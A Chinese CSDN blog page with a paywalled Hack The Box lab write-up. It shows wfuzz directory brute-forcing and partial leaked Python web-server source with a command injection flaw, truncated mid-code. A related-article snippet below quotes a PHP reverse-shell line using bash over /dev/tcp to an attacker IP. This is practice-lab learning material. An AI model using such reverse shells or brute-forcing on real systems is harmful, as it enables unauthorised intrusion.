HTB靶机渗透

最新推荐文章于 2025-06-10 09:24:03 发布
最新推荐文章于 2025-06-10 09:24:03 发布
阅读量1.1k 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41645130/article/details/104389116
本文详细记录了一次渗透测试的过程,从信息收集开始,包括设置hosts文件,扫描开放端口,发现源码泄露并进行目录爆破。审计源码后,发现命令注入漏洞,利用此漏洞反弹shell。接着通过解密加密文件获取user flag。在提权阶段,分析程序行为,找到以root权限执行命令的途径,最终成功获取root权限。整个过程揭示了代码审计和漏洞利用的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

信息收集

这里可以先设置一下hosts文件

10.10.10.168 obscure.htb

扫描端口发现开放了 8080 的web端口

页面提示有一个源码泄露

Message to server devs: the current source code for the web server is in 'SuperSecureServer.py' in the secret development directory

那我们就需要爆破目录了

使用 wfuzz

sudo wfuzz -c -z file,common.txt -u http://10.10.10.168:8080/FUZZ/SuperSecureServer.py
10651191-13c6157263095851.png

得到源码:

import socket
import threading
from datetime import datetime
import sys
import os
import mimetypes
import urllib.parse
import subprocess

respTemplate = """HTTP/1.1 {statusNum} {statusCode}
Date: {dateSent}
Server: {server}
Last-Modified: {modified}
Content-Length: {length}
Content-Type: {contentType}
Connection: {connectionType}

{body}
"""
DOC_ROOT = "DocRoot"

CODES = {"200": "OK", 
        "304": "NOT MODIFIED",
        "400": "BAD REQUEST", "401": "UNAUTHORIZED", "403": "FORBIDDEN", "404": "NOT FOUND", 
        "500": "INTERNAL SERVER ERROR"}

MIMES = {"txt": "text/plain", "css":"text/css", "html":"text/html", "png": "image/png", "jpg":"image/jpg", 
        "ttf":"application/octet-stream","otf":"application/octet-stream", "woff":"font/woff", "woff2": "font/woff2", 
        "js":"application/javascript","gz":"application/zip", "py":"text/plain", "map": "application/octet-stream"}


class Response:
    def __init__(self, **kwargs):
        self.__dict__.update(kwargs)
        now = datetime.now()
        self.dateSent = self.modified = now.strftime("%a, %d %b %Y %H:%M:%S")
    def stringResponse(self):
        return respTemplate.format(**self.__dict__)

class Request:
    def __init__(self, request):
        self.good = True
        try:
            request = self.parseRequest(request)
            self.method = request["method"]
            self.doc = request["doc"]
            self.vers = request["vers"]
            self.header = request["header"]
            self.body = request["body"]
        except:
            self.good = False

    def parseRequest(self, request):        
        req = request.strip("\r").split("\n")
        method,doc,vers = req[0].split(" ")
        header = req[1:-3]
        body = req[-1]
        headerDict = {}
        for param in header:
            pos = param.find(": ")
            key, val = param[:pos], param[pos+2:]
            headerDict.update({key: val})
        return {"method": method, "doc": doc, "vers": vers, "header": headerDict, "body": body}


class Server:
    def __init__(self, host, port):    
        self.host = host
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((self.host, self.port))

    def listen(self):
        self.sock.listen(5)
        while True:
            client, address = self.sock.accept()
            client.settimeout(60)
            threading.Thread(target = self.listenToClient,args = (client,address)).start()

    def listenToClient(self, client, address):
        size = 1024
        while True:
            try:
                data = client.recv(size) # 收到客户端的数据,应该就是数据包
                if data:
                    # Set the response to echo back the recieved data 
                    req = Request(data.decode()) # byte转str,返回的req是list
                    self.handleRequest(req, client, address)
                    client.shutdown()
                    client.close()
                else:
                    raise e
最低0.47元/天 解锁文章

200万优质内容无限畅学
萍水间人
关注
HTB:Active渗透测试
MSB_WLAQ的博客
09-30 826
基础信息 简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透。 链接:https://www.hackthebox.eu/home/machines/profile/113 描述: 注:没有网络安全就没有国家安全,以巩固国家安全防护为由对于该计算机进行渗透,所有行为都是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的.
[渗透测试]HTB靶机-Archetype
Y4tacker的博客
07-17 1376
文章目录工具介绍smbclientpsexecArchetype 工具介绍 smbclient Smbclient(samba client)是基于SMB协议的,用于存取共享目标的客户端程序。 参数: 网络资源 网络资源的格式为//服务器名称/资源分享名称。 密码 输入存取网络资源所需的密码。 -B 传送广播数据包时所用的IP地址。 -d< 排错层级> 指定记录文件所记载事件的详细程度。 -E 将信息送到标准错误输出设备。 -h 显示帮助。 -i< 范围> 设置NetBIOS名称范围
HTB 靶机 TombWatcher Write-up(Medium)
最新发布
qq_45203884的博客
06-10 3546
本文详细描述了针对Active Directory域控制器10.10.11.72的渗透测试过程。通过端口扫描发现关键域服务后,利用初始凭证henry:H3nry_987TGV!进行用户枚举和BloodHound分析,发现一条复杂攻击链:首先通过WriteSPN权限对alfred进行Kerberoasting获取密码,再利用AddSelf权限加入infrastructure组读取gMSA账户哈希,随后强制重置sam密码并获取john的控制权。最终通过恢复被删除的cert_admin用户,利用ADCS提权成功获
【网络安全】HTB靶机渗透系列之Sniper
HBohan的博客
03-21 2406
介绍 Sniper是一个中等难度的靶机,知识点涉及本地文件包含利用、远程文件包含利用、凭证制作、恶意chm文件利用等。 通关思维导图 侦查 端口探测 首先使用 nmap 进行端口扫描 nmap -Pn -p- -sV -sC -A 10.10.10.151 -oA nmap_Sniper 80端口 访问后发现是一家名为 Sniper Co. 的公司,主要业务是快递 点击Our servers会跳转至/blog/index.php,点击User Portal会跳转至/user/login.php登陆界
HTB系列】靶机Teacher的渗透测试详解
大方子
04-27 1524
Kali: 10.10.14.50 靶机地址:10.10.10.153 先用nmap 对靶机进行扫描 nmap -sC -sV -sT 10.10.10.153 只开启了80端口,网页内容如下 一个静态的网页,还有一些其他的页面,Courses,Students等等 检查下网页的源代码,在GALLERY页面发现一个奇怪的点 ...
HTB靶机渗透之bizness(linux-eazy)
m0_60351808的博客
03-08 698
靶机ip:10.10.11.252攻击机ip:10.10.16.2首先用nmap去扫描主机获取主机端口信息可以看到扫描结果中暴露了80,22,443端口,其中域名为bizness.htb,22端口的渗透优先级应该靠后,应当先进行80或443端口的渗透,我们照例使用dirsearch来扫描一下网站目录扫描结果很多,总结一下暴露了后台地址,也暴露了框架为solr,后台管理系统为ofbiz18.12由于在主页没有看到任何其他的链接,所以我们暂时梳理一下目前可用的信息端口:80,443,22。
网络安全:HTB靶机渗透系列之Sniper
2201_75856701的博客
02-10 311
站点中存在两个重要的目录,分别为user和blog,blog目录在语言切换中使用?lang=xx.php,这很大程度上说明可能存在文件包含漏洞;user目录则用于用户注册和登陆账号,在之后的会话利用也帮助我们拿到了sessionid,从而确认了session地址。文件包含漏洞验证成功后我们发现存在两种上线方式,一是本地文件包含利用,即通过包含session位置中注册用户名(PHP代码)来达到代码执行的效果;二是相对简单的远程文件包含利用,即只要在本地放置木马文件请求包含就可获取权限。
[渗透测试]HTB靶机-Oopsie
Y4tacker的博客
07-22 692
文章目录Oopsie Oopsie 首先跳过nmap扫描的过程,现在我们直接开始日,发现了 http://10.10.10.28/cdn-cgi/login/admin.php 用admin和MEGACORP_4dm1n!! 这里存在一个水平越权的漏洞,具体不给出分析了,看cookie都懂 垂直越权后发现存在文件上传点 这里来反弹一个shell <?php exec("/bin/bash -c 'bash -i &> /dev/tcp/10.10.14.166/4444 0&lt
HTB-Hospital渗透测试
weixin_53325365的博客
11-25 1714
Hack the box的注册以及开通请移步其他文章,下载好靶场的vpn文件后,通常情况下,为了降低延迟我会选择在ovpn文件中加入代理如socks-proxy ip地址 port由于是第一篇htb的文章,所以如何开启靶场的过程相对详细一点,最后开启靶机测试连接的延迟。
HTB靶机011-Node-WP
灰蜗牛
05-12 2283
HTB靶机011-Node-WP,这题比较复杂,最后提权是难点
HTB靶机01-Blue-WriteUp
灰蜗牛
04-06 4883
Blue 简介 OS:Windows; 难度:Easy 文章目录Blue 简介WriteUp0.SCAN1. MS17-010 利用他山之石 WriteUp 连接HTB靶场:sudo openvpn xxxx.ovpn 测试靶机连通性: ┌──(xavier㉿xavier)-[~] └─$ ping -c 4 10.10.10.40 PING 10.10.10.40 (10.10.10.40) 56(84) bytes of data. 64 bytes from 10.10.10.40: icm
HTB靶机渗透测试之Surveillance(Linux · Medium)
m0_60351808的博客
02-02 1523
kali机器ip:10.10.16.53靶机ip:10.10.11.245首先nmap拿到基本端口开放信息发现开放了22和80两个端口,22是ssh,渗透优先级靠后,先看看80端口,浏览器访问(省略修改hosts文件步骤)用紫色小插件看出收集基本信息,得到有效信息craft cms,这是个美国公司开发的内容管理系统,找到一个可能的突破点接下来对该网站进行目录爆破和子域名爆破,分别使用dirsearch和gobuster步骤及结果如下。
HTB靶机:RainyDay
LainWith的博客
11-27 1901
系统:linux难度:困难发布日期:2022/10/16其他信息:2022年10月24日靶场删除了泄露的root的 SSH 密钥,并更改了泄露的root密码。个人打靶发现靶机还删除了python,其他变化尚未发现。补充:这台靶机与Vulnhub靶机较为相似,只是利用起来更复杂很多。
HTB系列】靶机Bitlab的渗透测试
大方子
01-23 2974
https://note.youdao.com/ynoteshare1/index.html?id=4af5cf2cde031f1bbd9dd5d434661fb9&type=note
HTB靶场系列 linux靶机 Tartarsause靶机
顶峰
12-14 479
2.在分享的文件夹中创建一个回连shell脚本命名为wp-load.php,我使用的是/usr/share/webshells/php/php-reverse-shell.php这个msf的脚本,注意修改脚本内的host和port。那么我们的思路就有了,就是在上述脚本完成备份后休息的那三十秒,我们打开备份,修改其中的某个文件为/root/root.txt然后再把这个备份重新压缩好,把原来的备份删掉,之后打开错误报告查看root文件就是了。注意,端口改自己脚本中的端口,地址的端口最后必须加/
HTB靶机系列-SwagShop
蚁景网安学院
07-16 791
介绍今天给大家带来的是一个HTB(hackthebox)的靶机—SwagShop,这是一个easy级别的linux系统的靶机,所以主要是对枚举,信息收集等手段的考察。对OSCP感兴趣的同...
HTB靶场系列 Linux靶机 Bashed靶机
m0_57221101的博客
01-10 1434
勘探 惯例先用nmap扫描一下端口,发现开了80端口 ┌──(root????Mr)-[~/dirsearch] └─# nmap 10.10.10.68 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 14:30 CST Nmap scan report for 10.10.10.68 Host is up (1.2s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/
HTB靶机渗透之headless(linux-easy)
m0_60351808的博客
03-29 1667
这个靶机难度还行,只是攻击方式很新颖,以前没接触过,一时不知道如何下手,功力还有所欠缺啊!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值